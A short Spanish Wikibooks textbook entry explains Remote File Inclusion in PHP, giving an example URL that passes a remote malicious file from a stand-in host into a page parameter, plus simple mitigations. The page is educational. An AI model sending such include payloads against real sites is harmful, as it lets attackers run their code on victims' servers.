Seguridad informática/Remote File Inclusion

De Wikilibros, la colección de libros de texto de contenido libre.

Remote File Inclusion, su traducción es Inclusión de Archivo Remota. Esta es una vulnerabilidad en la programación web. Puede ser una de las vulnerabilidades más críticas. Esta consiste en utilizar un código maligno almacenado en un host remoto y ejecutarlo en el servidor de la víctima. Un ejemplo de una URL sería: http://www.webvulnerable.com/index.php?pagina=http://www.codigos.com/maligno.txt De esta manera el host "webvulnerable.com" ejecutaría el archivo que se encuentra en "codigos.com", este archivo puede contener un sistema de administración de archivos, de esta manera el atacante podrá ejecutar acciones en el servidor ajeno. Esta vulnerabilidad se encuentra al utilizar un include en un querystring. index.php?pagina= Esto se podría solucionar utilizando un código que al detectar que "pagina=http://*" automaticamente se muestre la página principal. O bien no utilizar este tipo de sistemas y simplemente usar links completos. Esta vulnerabilidad afecta a gran parte de los sitios. Se podría considerar como una vulnerabilidad de riesgo crítico.